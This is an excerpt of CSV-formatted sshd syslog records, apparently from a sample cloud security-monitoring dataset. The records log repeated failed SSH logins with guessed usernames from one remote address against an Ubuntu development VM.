+19724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:10,UbuntuDevEnv,2019-06-06 18:10:10,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38592:11: Normal Shutdown, Thank you for playing [preauth]",10536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38592,,
+19725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:10,UbuntuDevEnv,2019-06-06 18:10:10,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 128.199.149.61 port 38592 [preauth],10536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,128.199.149.6,38592,,
+19726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:17,UbuntuDevEnv,2019-06-06 18:10:17,auth,UbuntuDevEnv,info,Invalid user ftproot from 128.199.149.61 port 43222,10554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftproot,128.199.149.6,43222,,
+19727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:18,UbuntuDevEnv,2019-06-06 18:10:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ftproot 128.199.149.61 port 43222 [preauth],10554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftproot,128.199.149.6,43222,,
+19728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:18,UbuntuDevEnv,2019-06-06 18:10:17,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43222:11: Normal Shutdown, Thank you for playing [preauth]",10554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43222,,
+19729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:24,UbuntuDevEnv,2019-06-06 18:10:24,auth,UbuntuDevEnv,info,Invalid user ftpwww from 128.199.149.61 port 47844,10560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpwww,128.199.149.6,47844,,
+19730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:24,UbuntuDevEnv,2019-06-06 18:10:24,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47844:11: Normal Shutdown, Thank you for playing [preauth]",10560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47844,,
+19731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:24,UbuntuDevEnv,2019-06-06 18:10:24,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpwww 128.199.149.61 port 47844 [preauth],10560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpwww,128.199.149.6,47844,,
+19732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:31,UbuntuDevEnv,2019-06-06 18:10:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user sys 128.199.149.61 port 52472 [preauth],10577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sys,128.199.149.6,52472,,
+19733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:31,UbuntuDevEnv,2019-06-06 18:10:31,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52472:11: Normal Shutdown, Thank you for playing [preauth]",10577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52472,,
+19734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:38,UbuntuDevEnv,2019-06-06 18:10:37,auth,UbuntuDevEnv,info,Invalid user sybase from 128.199.149.61 port 57088,10583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sybase,128.199.149.6,57088,,
+19735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:38,UbuntuDevEnv,2019-06-06 18:10:37,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57088:11: Normal Shutdown, Thank you for playing [preauth]",10583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57088,,
+19736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:38,UbuntuDevEnv,2019-06-06 18:10:37,auth,UbuntuDevEnv,info,Disconnected from invalid user sybase 128.199.149.61 port 57088 [preauth],10583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sybase,128.199.149.6,57088,,
+19737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:45,UbuntuDevEnv,2019-06-06 18:10:44,auth,UbuntuDevEnv,info,Invalid user sysop from 128.199.149.61 port 33486,10594,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysop,128.199.149.6,33486,,
+19738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:45,UbuntuDevEnv,2019-06-06 18:10:44,auth,UbuntuDevEnv,info,Disconnected from invalid user sysop 128.199.149.61 port 33486 [preauth],10594,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysop,128.199.149.6,33486,,
+19739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:45,UbuntuDevEnv,2019-06-06 18:10:44,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33486:11: Normal Shutdown, Thank you for playing [preauth]",10594,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33486,,
+19740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:52,UbuntuDevEnv,2019-06-06 18:10:51,auth,UbuntuDevEnv,info,Invalid user contact from 128.199.149.61 port 38108,10608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,contact,128.199.149.6,38108,,
+19741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:52,UbuntuDevEnv,2019-06-06 18:10:52,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38108:11: Normal Shutdown, Thank you for playing [preauth]",10608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38108,,
+19742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:52,UbuntuDevEnv,2019-06-06 18:10:52,auth,UbuntuDevEnv,info,Disconnected from invalid user contact 128.199.149.61 port 38108 [preauth],10608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,contact,128.199.149.6,38108,,
+19743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:58,UbuntuDevEnv,2019-06-06 18:10:58,auth,UbuntuDevEnv,info,Invalid user content from 128.199.149.61 port 42736,10624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,content,128.199.149.6,42736,,
+19744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:59,UbuntuDevEnv,2019-06-06 18:10:58,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42736:11: Normal Shutdown, Thank you for playing [preauth]",10624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42736,,
+19745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:59,UbuntuDevEnv,2019-06-06 18:10:58,auth,UbuntuDevEnv,info,Disconnected from invalid user content 128.199.149.61 port 42736 [preauth],10624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,content,128.199.149.6,42736,,
+19746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:06,UbuntuDevEnv,2019-06-06 18:11:05,auth,UbuntuDevEnv,info,Invalid user tony from 128.199.149.61 port 47360,10636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tony,128.199.149.6,47360,,
+19747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:06,UbuntuDevEnv,2019-06-06 18:11:06,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47360:11: Normal Shutdown, Thank you for playing [preauth]",10636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47360,,
+19748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:06,UbuntuDevEnv,2019-06-06 18:11:06,auth,UbuntuDevEnv,info,Disconnected from invalid user tony 128.199.149.61 port 47360 [preauth],10636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tony,128.199.149.6,47360,,
+19749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:13,UbuntuDevEnv,2019-06-06 18:11:12,auth,UbuntuDevEnv,info,Invalid user carina from 128.199.149.61 port 51994,10655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carina,128.199.149.6,51994,,
+19750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:13,UbuntuDevEnv,2019-06-06 18:11:12,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 51994:11: Normal Shutdown, Thank you for playing [preauth]",10655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,51994,,
+19751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:13,UbuntuDevEnv,2019-06-06 18:11:12,auth,UbuntuDevEnv,info,Disconnected from invalid user carina 128.199.149.61 port 51994 [preauth],10655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carina,128.199.149.6,51994,,
+19752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:20,UbuntuDevEnv,2019-06-06 18:11:19,auth,UbuntuDevEnv,info,Invalid user martin from 128.199.149.61 port 56612,10661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martin,128.199.149.6,56612,,
+19753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:20,UbuntuDevEnv,2019-06-06 18:11:19,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56612:11: Normal Shutdown, Thank you for playing [preauth]",10661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56612,,
+19754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:20,UbuntuDevEnv,2019-06-06 18:11:19,auth,UbuntuDevEnv,info,Disconnected from invalid user martin 128.199.149.61 port 56612 [preauth],10661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martin,128.199.149.6,56612,,
+19755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:27,UbuntuDevEnv,2019-06-06 18:11:26,auth,UbuntuDevEnv,info,Invalid user builder from 128.199.149.61 port 33012,10671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,builder,128.199.149.6,33012,,
+19756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:27,UbuntuDevEnv,2019-06-06 18:11:27,auth,UbuntuDevEnv,info,Disconnected from invalid user builder 128.199.149.61 port 33012 [preauth],10671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,builder,128.199.149.6,33012,,
+19757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:27,UbuntuDevEnv,2019-06-06 18:11:27,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33012:11: Normal Shutdown, Thank you for playing [preauth]",10671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33012,,
+19758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:33,UbuntuDevEnv,2019-06-06 18:11:32,auth,UbuntuDevEnv,info,Invalid user ines from 128.199.149.61 port 37634,10684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ines,128.199.149.6,37634,,
+19759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:33,UbuntuDevEnv,2019-06-06 18:11:33,auth,UbuntuDevEnv,info,Disconnected from invalid user ines 128.199.149.61 port 37634 [preauth],10684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ines,128.199.149.6,37634,,
+19760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:33,UbuntuDevEnv,2019-06-06 18:11:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 37634:11: Normal Shutdown, Thank you for playing [preauth]",10684,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,37634,,
+19761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:40,UbuntuDevEnv,2019-06-06 18:11:40,auth,UbuntuDevEnv,info,Invalid user public from 128.199.149.61 port 42260,10690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,128.199.149.6,42260,,
+19762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:41,UbuntuDevEnv,2019-06-06 18:11:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42260:11: Normal Shutdown, Thank you for playing [preauth]",10690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42260,,
+19763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:41,UbuntuDevEnv,2019-06-06 18:11:40,auth,UbuntuDevEnv,info,Disconnected from invalid user public 128.199.149.61 port 42260 [preauth],10690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,128.199.149.6,42260,,
+19764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:47,UbuntuDevEnv,2019-06-06 18:11:46,auth,UbuntuDevEnv,info,Invalid user andreea from 128.199.149.61 port 46868,10705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andreea,128.199.149.6,46868,,
+19765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:47,UbuntuDevEnv,2019-06-06 18:11:46,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 46868:11: Normal Shutdown, Thank you for playing [preauth]",10705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,46868,,
+19766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:47,UbuntuDevEnv,2019-06-06 18:11:46,auth,UbuntuDevEnv,info,Disconnected from invalid user andreea 128.199.149.61 port 46868 [preauth],10705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andreea,128.199.149.6,46868,,
+19767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:54,UbuntuDevEnv,2019-06-06 18:11:54,auth,UbuntuDevEnv,info,Invalid user patrik from 128.199.149.61 port 51488,10720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,patrik,128.199.149.6,51488,,
+19768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:54,UbuntuDevEnv,2019-06-06 18:11:54,auth,UbuntuDevEnv,info,Disconnected from invalid user patrik 128.199.149.61 port 51488 [preauth],10720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,patrik,128.199.149.6,51488,,
+19769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:11:54,UbuntuDevEnv,2019-06-06 18:11:54,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 51488:11: Normal Shutdown, Thank you for playing [preauth]",10720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,51488,,
+19770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:01,UbuntuDevEnv,2019-06-06 18:12:00,auth,UbuntuDevEnv,info,Invalid user super from 128.199.149.61 port 56134,10736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,128.199.149.6,56134,,
+19771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:01,UbuntuDevEnv,2019-06-06 18:12:00,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56134:11: Normal Shutdown, Thank you for playing [preauth]",10736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56134,,
+19772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:01,UbuntuDevEnv,2019-06-06 18:12:00,auth,UbuntuDevEnv,info,Disconnected from invalid user super 128.199.149.61 port 56134 [preauth],10736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,128.199.149.6,56134,,
+19773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:07,UbuntuDevEnv,2019-06-06 18:12:07,auth,UbuntuDevEnv,info,Invalid user marcel from 128.199.149.61 port 60736,10744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcel,128.199.149.6,60736,,
+19774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:07,UbuntuDevEnv,2019-06-06 18:12:07,auth,UbuntuDevEnv,info,Disconnected from invalid user marcel 128.199.149.61 port 60736 [preauth],10744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcel,128.199.149.6,60736,,
+19775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:07,UbuntuDevEnv,2019-06-06 18:12:07,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 60736:11: Normal Shutdown, Thank you for playing [preauth]",10744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,60736,,
+19776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:14,UbuntuDevEnv,2019-06-06 18:12:14,auth,UbuntuDevEnv,info,Invalid user carol from 128.199.149.61 port 37160,10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carol,128.199.149.6,37160,,
+19777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:14,UbuntuDevEnv,2019-06-06 18:12:14,auth,UbuntuDevEnv,info,Disconnected from invalid user carol 128.199.149.61 port 37160 [preauth],10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carol,128.199.149.6,37160,,
+19778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:14,UbuntuDevEnv,2019-06-06 18:12:14,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 37160:11: Normal Shutdown, Thank you for playing [preauth]",10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,37160,,
+19779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:21,UbuntuDevEnv,2019-06-06 18:12:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 41740:11: Normal Shutdown, Thank you for playing [preauth]",10773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,41740,,
+19780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:21,UbuntuDevEnv,2019-06-06 18:12:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user mail 128.199.149.61 port 41740 [preauth],10773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mail,128.199.149.6,41740,,
+19781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:28,UbuntuDevEnv,2019-06-06 18:12:28,auth,UbuntuDevEnv,info,Invalid user super from 128.199.149.61 port 46372,10779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,128.199.149.6,46372,,
+19782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:28,UbuntuDevEnv,2019-06-06 18:12:28,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 46372:11: Normal Shutdown, Thank you for playing [preauth]",10779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,46372,,
+19783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:28,UbuntuDevEnv,2019-06-06 18:12:28,auth,UbuntuDevEnv,info,Disconnected from invalid user super 128.199.149.61 port 46372 [preauth],10779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,128.199.149.6,46372,,
